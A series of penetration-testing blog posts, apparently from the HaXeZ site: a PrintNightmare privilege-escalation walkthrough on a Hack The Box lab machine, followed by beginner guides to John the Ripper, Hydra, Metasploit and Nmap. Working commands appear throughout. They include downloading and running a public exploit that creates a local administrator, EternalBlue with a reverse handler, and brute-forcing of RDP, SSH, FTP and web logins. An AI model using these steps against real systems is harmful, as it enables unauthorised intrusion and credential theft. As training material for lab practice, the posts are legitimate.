PrintNightmare Privilege Escalation

Hello world, welcome to Haxez. In this post, I’m going to be demonstrating how to perform the PrintNightmare privilege escalation exploit. I will be using Evil-WinRM and the CVE-2021-1675.ps1 script by Caleb Stewart on GitHub. I’ve just completed the retired easy Hack The Box machine Driver and was blown away by this vulnerability. It’s easy to see why it is such a serious vulnerability.

What Is PrintNightmare?

The vulnerability exists because the Spooler service does not properly validate the driver when it is installed on a system. This can allow an attacker to install a malicious driver. Once installed, an attacker can exploit the vulnerability in the Print Spooler service to execute arbitrary code with system-level privileges.

This vulnerability can be exploited even if the user account used to install the driver has limited privileges. This is because the Print Spooler service runs with system-level privileges. This means that it has the ability to install and execute drivers with elevated privileges.

To mitigate the risk of exploitation, it is important to apply the appropriate patches and updates provided by Microsoft. Additionally, implementing other measures such as restricting access to the Spooler service and disabling it on systems.

The Scenario

A threat actor has obtained network access and a domain user’s credentials whether through phishing or some other social engineering attack. They can check the spooler service on the target host via the ‘impacket-rpcdump’ tool. If the following protocol is included in the output then it could be a good candidate for the exploit.

┌──(kali㉿kali)-[~/Driver/scripts]
└─$ impacket-rpcdump @10.129.95.238               
--snip--
Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncacn_ip_tcp:10.129.95.238[49410]
          ncalrpc:[LRPC-188127abacea381ad9]
--snip--
PrintNightmare impacket-rpcdump

The PrintNightmare Payload

In order to leverage this vulnerability to elevate privileges, we first need a payload to exploit it. Such an exploit is publically available on GitHub right now at the following URL https://github.com/calebstewart/CVE-2021-1675. We can use wget on our attack box to download this payload and store it in our scripts directory.

┌──(kali㉿kali)-[~/Driver/scripts]
└─$ wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
--2023-03-17 18:04:25--  https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 2606:50c0:8000::154, 2606:50c0:8001::154, 2606:50c0:8002::154, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8000::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8001::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8002::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8003::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 178561 (174K) [text/plain]
Saving to: ‘CVE-2021-1675.ps1.1’

CVE-2021-1675.ps1.1                     100%[============================================================================>] 174.38K  --.-KB/s    in 0.03s   
2023-03-17 18:04:26 (4.96 MB/s) - ‘CVE-2021-1675.ps1.1’ saved [178561/178561]
Wget CVE-2021-1675

The Foothold

We will need user credentials in order to perform this exploit. These could be obtained through many nefarious methods but I will leave that to your imagination. Once we have the credentials, we can connect to the box via the Evil-WinRM tool. As you can see from the output below, I’m connecting to the target host with the user tony. Furthermore, the password for tony’s account is ‘liltony’. I’ve specified the target IP address with the ‘-i’ flag and I’ve also specified my script directory with the ‘-s’ flag.

┌──(kali㉿kali)-[~/Driver]
└─$ evil-winrm -i 10.129.95.238 -u 'tony' -p 'liltony' -s /home/kali/Driver/scripts/
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents> menu

   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (     '    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/

       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
PrintNightmare Evil-WinRM

The Exploit

We can now load the script that we saved to our script directory earlier by typing the script name (CVE-2021-1675.ps1). This will then load additional options into Evil-WinRM including the ability to ‘Invoke-Nightmare’. Typing ‘Invoke-Nightmare’ will then generate a new payload that will create a new user and add the user as a local administrator.

*Evil-WinRM* PS C:\Users\tony\Documents> CVE-2021-1675.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> menu

   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (     '    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/

       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Add-Win32Type 
[+] Dll-Loader 
[+] Donut-Loader 
[+] field 
[+] func 
[+] get_nightmare_dll 
[+] Invoke-Binary 
[+] Invoke-Nightmare 
[+] New-InMemoryModule 
[+] psenum 
[+] struct
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit

*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
PrintNightmare Invoke-Nightmare

The Consequence

We are now able to remote the target system with the new user. As you can see from the output below, the new user is a member of the local administrator’s group. From here we could install persistence or perform an LSA dump to dump credentials from memory. If a Domain Administrator has logged in to this system then it would be game over for the domain controller.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.129.95.238 -u 'adm1n' -p 'P@ssw0rd' -s /home/kali/Driver/scripts/
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adm1n\Documents> net localgroup
net.exe : System error 1312 has occurred.
    + CategoryInfo          : NotSpecified: (System error 1312 has occurred.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
A specified logon session does not exist. It may already have been terminated.
*Evil-WinRM* PS C:\Users\adm1n\Documents> whoami /groups

GROUP INFORMATION
-----------------
Group Name                                                    Type             SID          Attributes
============================================================= ================ 
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                                          Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288
*Evil-WinRM* PS C:\Users\adm1n\Documents> 
Game Over

PrintNightmare Conclusion

I know that this is an old vulnerability but I recently stumbled on a box that let me pull it off. I thought it was fascinating and was blown away by how simple it was. Granted, that’s down to the developers of the exploit and the developers of Evil-WinRM. However, if I can pull off an exploit like this then anybody can. All it takes is a few misconfigured permissions and the whole domain is at risk. Anyway, I wanted to write a post about it because I thought it was a cool exploit.

Hacking Tools: John The Ripper

Hello World and welcome to HaXez, the game’s afoot and in this post, I’m going to be talking about my favorite password-cracking tool, John The Ripper. John the Ripper is a multi-platform password cracking tool that can crack various password hashes. It was developed by OpenWall and was initially released in 1996. I believe John The Ripper got its name from another hacking tool called Jack The Cracker, or Cracker Jack. Anyway, you’re not here to read a reworded Wikipedia article.

Installing John The Ripper

John The Ripper should come preinstalled on most penetration testing Linux distributions. However, your package manager may have it if your distribution didn’t come with it preinstalled. For Debian-based distributions you can run:

sudo apt-get install john
Installing John The Ripper
Installing John The Ripper

If your package manager’s repositories don’t have John then you can install it from GitHub by using Git Clone. Then once it’s installed you can view the documentation by either running john -h or by looking at the man pages.

John The Ripper Features

As mentioned, John can crack a variety of different password hashes. You can see exactly which hashes he can crack by running the list formats command. This command is also helpful when trying to manually specify a hash type. If you’re in an exam and have forgotten how to ask John to crack a raw MD5 hash, then this command could help.

sudo john --list=formats
John The Ripper List Formats
John The Ripper List Formats

The functionality doesn’t end with mere password cracking though. John has a variety of tools to aid you in the heinous slaughtering of innocent password hashes. These additional tools can normally be found in your /usr/bin or /opt/john/src/ directories. Furthermore, these tools can be used for things like extracting hashes from password-protected ZIP or RAR archives.

Additional John Tools
Additional John Tools

John The Ripper Cracking Modes

John has a number of different password hash cracking modes. These various modes can be used to crack password hashes in different ways. If one method of cracking a password hash didn’t work, then you could try a different mode.

Wordlist Mode

By far the most common mode I’ve used is the wordlist mode. This mode requires the user to specify a wordlist. This wordlist could be bespoke and created by tools like Crunch. Or it could be one of the many wordlists available on the internet. John will then go through the list line by line attempting to match the hash to the word. This mode also offers a mangle option where it will apply rules to the word. In short, the word password could be automatically mangled to something like P@55W0RD.

Single Crack Mode

As stated on the Openwall (John Developers) website, the single crack mode is the cracking mode you should start with. It will use login names, full names, and user home directory names as candidate passwords. It will then apply a large set of mangling rules. Successfully cracked passwords will also be tried against any other hashes that have been loaded. In theory, this mode should be able to crack a list of password hashes faster than if you were to supply the hashes separately.

Incremental Mode

This mode will try all possible character combinations. This is a powerful mode but would likely take longer than using a wordlist. If it tries all possible character combinations then it would eventually guess the correct password. If you know the length of the password then you can specify it to make cracking quicker. However, if you don’t know the length of the password and the password is a fairly long and complex one, then you could be waiting a while… like forever.

External Mode

From what I’ve read and what I understand, I believe this mode requires you to create your own cracking mode. The program code is a subset of C and would be compiled by John at startup. This could be useful if the hashing algorithm used to create the hash is bespoke. You could then write your own cracking module and load it into john to crack those custom-created hashes.

Identifying Hashes

John The Ripper will automatically attempt to identify the hashes that you give him. However, this can be prone to error. Fortunately, there are plenty of tools out there that you can use to identify password hash types. One such tool is hash-identifier which will come preinstalled or should be installable via your package manager or via cloning it from GitHub. To run the tool you simply type the name and then it will ask you to submit your hash. It will then spit out a list of hash types in the order of likelihood. Then you can use that information to manually tell John what type of hash you want to crack.

Hash Identifier
Hash Identifier

Getting Wordlists

A question I get asked a lot is where I get my word list from. Well, there are many locations. Most penetration distributions come with a wordlist preinstalled. However, you can download them from the internet. One particular wordlist that I would like to shine a light on is seclists. Seclists is available from GitHub and has almost every type of wordlist you could ever want. For the purposes of this demonstration, I will be using the rockyou.txt wordlist from the rockyou.com data breach.

Seclists
Seclists

Cracking MD5 Hashes With John The Ripper

As mentioned earlier, John can crack a variety of password hashes. The example below shows how you can crack an MD5 hash. An MD5 Hash or MD5 message-digest algorithm is cryptographically broken but still commonly use having a function that produces a 128-bit hash value. MD5 was originally designed by Ronal Rivest in 1991 as a method of replacing MD4 hashes. I used the following syntax to crack the MD5 hash.

sudo john --format=raw-md5 --wordlist=rockyou.txt hash1.txt
John The Ripper Crack MD5 Hash
John The Ripper Crack MD5 Hash

Cracking SHA1 Hashes With John The Ripper

The next hash that somehow managed to sneak its way into my directory is a SHA1 hash. SHA1 is a cryptographically broken encryption cipher that was originally designed by the National Security Agency. It was initially released in 1993 and produces a 160-bit hash. The following syntax shows how you can crack a SHA1 hash.

sudo john --format=raw-sha1 --wordlist=rockyou.txt hash2.txt
Cracking SHA1 Hashes With John The Ripper
Cracking SHA1 Hashes With John The Ripper

Cracking SHA256 Hashes With John The Ripper

Where did this hash come from? never mind, I’m sure our friend John can dispatch it fairly quickly. SHA256 is another cryptographically broken hashing algorithm that was developed by the National Security Agency (it’s almost as if they were designing them to fail).

sudo john --format=raw-sha256 --wordlist=rockyou.txt hash4.txt
Cracking SHA256 Hashes With John The Ripper
Cracking SHA256 Hashes With John The Ripper

Cracking Whirlpool Hashes With John The Ripper

What’s that? no secret is safe? Well if you use a crappy password and someone is able to obtain your password hash then you aren’t far from the truth. have you considered doing a password audit of your employee’s passwords to ensure they are secure? Maybe now is a good time. The syntax below shows how you can crack Whirlpool hashes. Whirlpool is a broken cryptographic algorithm designed by Vincent Rijmen and was first published in 2000.

sudo john --format=whirlpool --wordlist=rockyou.txt hash4.txt
Cracking Whirlpool Hashes With John The Ripper
Cracking Whirlpool Hashes With John The Ripper

Cracking MD4 Hashes With John The Ripper

MD4 hashes are outdated but you would be surprised to see how many organizations still use broken and outdated cryptographic algorithms. MD4 is a cryptographically broken encryption cipher originally developed by Ronal Rivest and first published in 1990. The syntax below shows you how to crack passwords encrypted with MD4 hashing algorithms.

sudo john --format=raw-md4 --wordlist=rockyou.txt hash5.txt
Cracking MD4 Hashes With John The Ripper
Cracking MD4 Hashes With John The Ripper

John.pot

Did I just rickroll you via password hashes? well yeah, I did and I refused to apologize. This post took me a day to write up and unfortunately you have to deal with the consequences. So, what happens to all the password hashes that get cracked by john? Well, they get stored in a file called john.pot. You can use locate on your system to find this but it is usually located in /root/.john/john.pot. If you’re trying to crack a hash but are getting an error message then it is likely you have already cracked it. Deleted the john.pot file or remove the line with the cracked has in order to re-crack the file.

sudo cat /root/.john/john.pot
John.pot
John.pot

Conclusions

John The Ripper is a fantastic tool that is near and dear to my heart. Yes, there are alternatives such as Hashcat but this is a mainstay of cybersecurity. It does what it needs to do and provides a simple way of doing it. It is one of my favorite tools for hacking and I will continue using it until it is no longer feasible to do so. I realize I have only scraped the surface on the functionality of John The Ripper but this post isn’t meant for advanced usage, it is merely a guide on how to get started with John The Ripper. So get slaying and let me know how you get on.

Hacking Tools: Hydra

Hello World and welcome to HaXeZ, today we’re talking about the brute forcing tool THC Hydra. According to Wikipedia, Hydra is a parallelized network logon cracker. It is available on a number of Penetration Testing Linux distributions such as Kali Linux, Parrot OS, Black Arch, and BackBox. Hydra has the ability to perform attacks against various different network services including Remote Desktop, Secure Shell, and many others. It is also capable of performing brute force attacks against web applications.

Installing Hydra

Hydra tends to come preinstalled on most penetration testing distributions. However, it can also be installed using apt. If your repositories don’t have Hydra for whatever reason then it can easily be installed from GitHub using git clone.

Installing Hydra
Installing Hydra

Hydra For Brute Forcing RDP

Remote Desktop Protocol or RDP is a remote management tool primarily used in Windows environments. It uses terminal services to allow users to connect to the target host using the RDP Client. The user will then be presented with a visual representation of the desktop. Furthermore, this will allow them to carry out management tasks. RDP is often attacked by hackers using automated tools like Hydra. Please see below for the syntax on how to attack RDP. The uppercase L specifies the user wordlist, the uppercase P specifies the password wordlist. The lowercase variants will allow you to specify individual words. The -F flag tells Hydra to stop once it has found a correct password. Then we specify the protocol, the IP address, and the verbosity.

sudo hydra -L usernames.txt -P passwords.txt -F rdp://10.0.2.5 -V
Hydra Brute Forcing RDP
Hydra Brute Forcing RDP

Brute Forcing SSH

SSH or Secure Shell is another remote management protocol. It is found in Linux or Unix environments but has recently been added to Windows. Furthermore, it is considered the successor to telnet. Telnet doesn’t use encryption so everything is transmitted in plaintext. If a threat actor were on your network performing a man-in-the-middle attack, they would be able to see your username and password transmitted to the telnet server. SSH is an encrypted protocol so if traffic was interncepted, it couldn’t be read. You can perform brute force attacks against SSH like so:

sudo hydra -L username.txt -P passwords.txt -F ssh://10.0.2.5 -V
Brute Forcing SSH
Brute Forcing SSH

Brute Forcing FTP

FTP is a protocol for transferring files and can also be subject to brute force attacks by Hydra. The syntax will be exactly the same as RDP and SSH. Just replace the protocol for FTP. You will notice a pattern start to emerge for basic network services. There is a lot more to Hydra and you can fine-tune your attacks to be more specific. To perform a brute force attack against FTP:

Sudo hydra -L username.txt -P passwords.txt -F ftp://10.0.2.5 -V
Brute Forcing FTP
Brute Forcing FTP

Brute Forcing Web Applications

You can also brute force web applications. However, the syntax to do so is a bit more complicated. You would start as we have done previously by specifying the username and password wordlist. However, you now need to specify the type of web attack whether it’s an “http-post-form” or “http-get-form” or whether it’s using basic authentication. Then you need to specify the path to the file to attack. Next, you need to specify the parameters to attack (username and password). Furthermore, you need to specify placeholders for the user and pass variables. Finally, you need to specify any cookies. You can see an example of this below:

hydra -L users.txt -P password.txt 10.0.2.5  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
Damn Vulnerable Web App
Damn Vulnerable Web App

Hydra Graphical User Interface

There is a graphical user interface for Hydra. To launch it you need to run the xhydra command. If you prefer GUI’s then this could be your preferred method of using hydra. Personally I prefer using the command line, I genuinly find it easier to configure than the GUI.

Xhydra Gui
Xhydra Gui

Tools: Metasploit

Dear friend, welcome to HaXeZ where today we’re talking about Metasploit. The Metasploit framework is an essential tool for any aspiring hacker or penetration tester. It comes preinstalled on many penetration testing distributions including Kali Linux. It is a framework that allows the user to select from a plethora of powerful tools. Furthermore, the user can then configure those tools with various options including the target’s IP address and port number.

Initializing Metasploit

As mentioned previously, several security-focused Linux distributions come with Metasploit preinstalled. However, you might need to initialize the database on first use. You can use the PostgresSQL database for many things including workspaces. Executing the ‘msfdb’ command will initialize the Metasploit Database.

┌──(kali㉿kali)-[~]
└─$ sudo msfdb init
[+] Starting database
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
msfdb init
msfdb init

Launching Metasploit

Metasploit can but launched using the ‘msfconsole’ command. It may take a moment, but eventually, it will load. Keep an eye out for the unique ASCII art each time you load the tool, especially the goose… HONK.

┌──(kali㉿kali)-[~]
└─$ msfconsole                                                                                                                            
  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
       =[ metasploit v6.1.41-dev-                         ]
+ -- --=[ 2216 exploits - 1171 auxiliary - 397 post       ]
+ -- --=[ 616 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Display the Framework log using the 
log command, learn more with help log
msf6 > 
Metasploit MSF Console
Metasploit MSF Console

Types Of Modules

Auxiliary – Auxiliary tools or modules are tools that don’t necessarily exploit the target host. These tools include scanners, fuzzers, and others. For example, some auxiliary tools can perform user enumeration through various services like SMTP.

Exploit – You can use exploit tools for exploiting a target. A buffer overflow is one example of an exploit tool. Buffer overflows work by sending specially crafted packets to the host. The packet exceeds the amount of data that the target was expecting. This then allows for the execution of additional code.

Post-Exploitation – A post-exploitation tool is just that, it’s a tool that you run against the target once exploited. This could be to gather more information about the target such as finding ways to elevate your privileges on the target.

Payload – Payloads allow you to interact with a target host once it has been exploited. There are many payloads such as reverse TCP shells. One popular payload is Meterpreter. Meterpreter payloads offer advanced functionality.

Searching For Modules

The vast number of tools available through Metasploit is what makes it so powerful. Imagine you’ve just finished scanning a target with Nmap and found that a particular Windows server is vulnerable to MS17-010 (Eternal Blue). Wouldn’t it be great if there was a single place where you could search for tools that could exploit your target? There is, and this is it. Using the search command you can search for specific vulnerabilities and if it has one, it will find it. As you can see from the example below.

msf6 > search ms17-010
Matching Modules
================
   #  Name    Disclosure Date  Rank     Check  Description
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

Configuring Modules

While there may be more options than the options I’m about to demonstrate, the options for a tool will have a similar structure. The MS17-010 exploit has a number of options which you can see below. The tool can also be configured with specific payloads. These payloads can be seen by using the show payloads command. Furthermore, some options are specific to the host you’re using. The LHOST and LPORT options are for specifying where you would like reverse shells to connect back to.

Metasploit Configuring Tools
Metasploit Configuring Tools

Executing Modules

So you have configured your module with the target’s IP address and port. You have selected your payload and are ready to exploit the target. What’s next? In order to run your module, you can use either the run or exploit commands. What’s the difference between run and exploit? none. Run is an alias of exploit. I’ve heard people say that they are different. That run should be used for running auxiliary tools and exploit for exploitation tools. Use whichever command you prefer provided it gets the job done.

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 
Metasploit Exploit Module
Metasploit Exploit Module

Metasploit Sessions

Sessions are ways to manage your connections to various targets. Successfully exploiting a target will automatically create a session. They are particularly useful when you are using multiple modules. For instance, If you have got a meterpreter session opened up but you want to use a post exploitation module then you can use the background command to return to Metasploit while keeping the session active. Furthermore, once you have found a post-exploitation module you can use the set session command to tell it to run against that session. Please see the video at the bottom of the page for a demonstration of using sessions.

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -l
Active sessions
===============
  Id  Name  Type                     Information                     Connection
  --  ----  ----                     -----------                     ----------
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ HARIS-PC  10.10.14.10:4444 -> 10.10.10.40:49161  (10.10.10.40)
Metasploit Sessions

Metasploit Workspaces

Workspaces are ways to separate your data. For example, if you were targeting two different organizations like the UK Conservative party and The SUN newspaper (Disclaimer – Examples only for comedic effect, this is not a form of encouragement). You would need a way to keep the data separate while you’re working on a way to exploit them. This is where the database comes in. Workspaces utilize the database to logically separate all data into those various workspaces. In order to create a workspace, you need to use the ‘workspace -a name-of-workspace’ command. You can view all your workspaces including your current active workspace by running the ‘workspace’ command. The workspace with the asterisk next to it is your current active workspace. To switch between workspaces just type workspace followed by the workspace name.

Metasploit Workspaces
Metasploit Workspaces

Conclusion

There is far more to Metasploit than I have covered in this article. To cover everything would require writing a whole book which many people have done. My aim here is to provide a brief overview of the tool and some of the basic functionality. If I’ve piqued your curiosity then download a fresh copy of Kali Linux or Parrot OS and have a tinker. There are many more features to explore including a friendly web interface. Please remember that attempting to hack into a system that you do not have permission to target will likely land you in a bit of trouble. There are plenty of legal ways to test out these tools in an environment purposely built to do so. Please see my other article on Hacking Legally for more information.

Tools: Nmap

Dear friend, welcome to HaXeZ where today I’m going to be talking about the network mapping tool Nmap. Nmap is a network scanner and was created by Gordon Lyon. It can be used to discover hosts on a network by sending packets to those hosts and then analyzing the responses. In other words, it can help you map out a target network. As a result, Nmap among other tools like Mass Scan is an essential tool for your ethical hacking tool kit. I use it on almost every engagement.

Nmap Host Discovery

As mentioned previously, Nmap can be used to discover hosts on a network. This can be done a number of ways but the most common is known as a ping sweep. A ping sweep does exactly that, it pings every host in the specified range and waits for a response to see if the host is online.

sudo nmap -sP 10.10.10.0-255

This can also be done without DNS resolution.

sudo nmap -sP 10.10.10.0-255 -n

However, this method isn’t full proof as hosts could have ICMP disabled meaning that they won’t respond to pings.

Nmap Ping Sweep
Nmap Ping Sweep

Nmap TCP Port Scan

The Nmap tool can also scan hosts and determine what TCP ports are open. This is done by initiating a three-way handshake with the host and analyzing the response. You can specify which ports or let it only scan the top 100 or 1000 ports. Additionally, you can also add service version detection to the scan by adding the ‘-sV’ argument.

sudo nmap -sT -sV -p0- 10.10.10.10
Nmap TCP Scan
Nmap TCP Scan

Nmap UDP Port Scan

Moreover, Nmap can also perform a UDP scan against the hosts. However, because UDP is a stateless protocol whereby the sending continues to send regardless of whether the host has responded, it can take time to determine whether a port is open.

sudo nmap -sU -p0- 10.10.10.10

Nmap Scripting Engine

One of the most powerful features of Nmap is its scripting engine. If you’re just starting out in computing or cyber, you could be forgiven for not knowing about it. Nmap is far more than a network scanner, it is a complete penetration testing framework. If you bring up your terminal and type in:

sudo locate *.nse
Locate NSE Scripts
Locate NSE Scripts

You can see the insane amount of scripts available for you to use against your targets. These scripts range from purely informational to exploitative. The scripts can be updated by running the following command.

sudo nmap --script-updatedb

SSL Scripts

One thing that I do frequently on an engagement is to test the configuration of the SSL certificate. This helps to ensure that all communication sent to and from the host is done so securely. Furthermore, it also helps to ensure that no specially crafted packets can be sent to the host to retrieve sensitive information.

sudo nmap --script ssl-cert -p 443 haxez.org

The command below can be used to enumerate the SSL ciphers and check for weak ones.

sudo nmap -sV --script ssl-enum-ciphers -p 443 haxez.org
Nmap SSL Certificiate Script
Nmap SSL Certificate Script

DNS Zone Transfer Script

There is also a script that can perform DNS zone transfers. While there are other tools like dig and fierce that have a far less complex syntax, if you’re in a pinch and only have Nmap then it’s nice to know the option is there. This can be done by running the following command.

sudo nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=zonetransfer.me -p53 nsztm1.digi.ninja

So, if you’re on an engagement and you notice TCP port 53 is open. You could grab an absolute wealth of information by performing a DNS zone transfer.

Nmap DNS Zone Transfer
Nmap DNS Zone Transfer

SMB Share Enumeration

Imagine you’ve stumbled into a network and you’ve scanned a host and noticed that port 445 is open. You know that this is the port for Server Message Block or SMB for short. You also know that this port is used to share files and folders/directories across the network. Wouldn’t it be great if there was a way to see what shares were being shared? Well, there’s a script for that.

nmap --script smb-enum-shares.nse -p445 192.168.56.103

SMB User Enumeration

Ok so you now know what the shares are but you don’t know any users on the system that would have the privileges to access them. Well, there is a script for that which allows you to enumerate the users of the system via the SMB share.

nmap --script smb-enum-users.nse -p445 192.168.56.103
Nmap SMB User Enumeration
Nmap SMB User Enumeration

FTP Brute

So you now have a list of usernames but what do you do with them? Are there any other services that you can see? What’s that? Its running FTP? Why not brute force that service with Nmap’s FTP Brute force script.

sudo nmap --script ftp-brute -p21 192.168.56.103 --script-args userdb=ftp_defuser.lst,passdb=ftp_defuser.lst
Nmap FTP Brute Force
Nmap FTP Brute Force

SSH Brute

You notice another box or that the same box is running the remote management protocol SSH. You have a list of users and some passwords which you got from the FTP service. Why not use that wordlist to go attack the SSH login too.

sudo nmap -p 22 --script ssh-brute --script-args userdb=/usr/share/legion/wordlists/ssh-user.txt,passdb=/usr/share/legion/wordlists/ssh-password.txt 192.168.56.103
Nmap SSH Brute

Other Arguments

Increase Verbosity

There are some other arguments that could help you with your scans too. If you wanted to see exactly what Nmap is doing then you could increase the verbosity.

add -v1 -v2 -v3

Increase Speed

Or if Nmap is running too slowly then you could increase the speed by adding a T4 argument to your scan. Be careful though as some systems with minimal resources might be offended by your scan and decided to crash due to resource exhaustion.

add -T1 -T2 -T3 -T4

Conclusion

There are so many other types of scans like Syn scans, and Xmas scans that I could talk about. I could spend weeks talking about all the different scripts available. I don’t want to make this article too long though. Hopefully, I’ve covered enough to get you started with Nmap and to realize its enormous potential. I use it on almost every test that I do simply because it has almost everything I need. That isn’t to say I don’t verify the results with other tools, but it is usually my starting point on any engagement once the passive reconnaissance is out of the way.

I’ve created a basic Nmap cheat sheet which you can download here.